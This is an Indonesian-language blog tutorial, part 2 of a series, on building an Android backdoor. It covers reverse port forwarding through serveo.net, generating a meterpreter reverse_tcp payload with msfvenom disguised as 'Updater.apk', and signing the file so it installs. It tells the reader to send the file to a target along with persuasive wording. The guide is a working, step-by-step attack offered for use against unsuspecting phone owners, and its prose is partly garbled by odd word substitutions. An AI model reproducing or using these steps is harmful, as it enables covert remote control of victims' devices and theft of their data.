Membuat Payload Metasploit Di Android || Part 2
Metasploit || Part 2
[Part 2]
Pada langkah kali ini kita akan berguru menciptakan payload atau backdoor memakai metasploit framework, kemudian kita akan berguru menggabungkan payload dengan sebuah aplikasi android yang nantinya kita kirimkan ke sasaran beserta kata-kata rayuan manis.
Bahan-bahan yang diperlukan:
- · Termux ( download disini )
- · Mixplorer (download disini) (alternatif 1)
- · MixSigner (download disini) (alternatif 1)
- · Internet yang stabil pada perangkat target/penyerang
Jika ada link yang mati/error, silahkan laporkan ke ig: ridho.zinta
Langkah-langkah:
[Bagian 1: Port Forwarding]
- Nyalakan terminal Termux, teman dapat mendownloadnya di google playstore
- Pastikan Metasploit Framework telah terpasang pada Termux sobat, Kalian dapat mengikuti tutorial disini
- Pada termux kita pasang pula openssh untuk nantinya kita melaksanakan port forwarding, ketik perintah dibawah ini pada terminal termux
pkg install openssh
4. Sekarang saatnya kita melaksanakan port forwarding, disini saya menentukan memakai server dari web serveo.net alasannya yaitu bersifat persistant dan lebih gampang untuk melaksanakan reverse tcp. Untuk menjalankannya ketik perintah dibawah ini pada termux:
ssh -R [port]:localhost:[port] serveo.net
nb: ganti [port] dengan port yang ingin dibuka, misal 4564
sehingga menjadi: ssh -R 4564:localhost:4564 serveo.net
Jika berhasil, maka akan terlihat menyerupai gambar dibawah ini:
[Bagian 2: Membuat file APK serta payloadnya]
- Tarik bilah kiri pada termux, kemudian buka session baru, ingat session untuk port forwarding diatas jangan ditutup ya, biar servicenya tetap berjalan
- Saatnya menciptakan backdoor berupa file APK, ketik perintah dibawah ini pada session gres tersebut:
msfvenom -p android/meterpreter/reverse_tcp LHOST=serveo.net LPORT=4564 R
> storage/downloads/Updater.apk
- Tunggu sebentar, bila berhasil maka akan menyerupai gambar dibawah ini:
- Oke kini file APK telah ada di memori internal sobat, tepatnya di folder download, eiits tapi inget, filenya masih mentah, blom dapat diinstall, perlu kita Signin dlu supaya dapat dipasang di semua android.
Nb: untuk merubah nama apknya , teman dapat memakai APK editor pro untuk merubah nama defaultnya (Main Activity) ataupun versi filenya.
[Bagian 3: Men-signing File Apk]
- Buka MiXplorer File manager yang sebelumnya sudah diinstall
- Arahkan ke kawasan file apk yang tadi gres dibuat
- Tekan usang pada file apknya, kemudian pilih sign dan pilih auto menyerupai pada gambar dibawah ini
- Jika sudah maka akan muncul file gres dengan nama Updater-signed.apk menyerupai gambar berikut.
- Sampai sini teman sudah berhasil menciptakan sebuah jadwal dengan payload didalamnya
Pada Part selanjutnya kita akan membahas cara memanggil payloadnya serta perintah-perintah seru yang dapat kita lakukan dengan metasploit
Sumber https://evocyberteam.blogspot.com/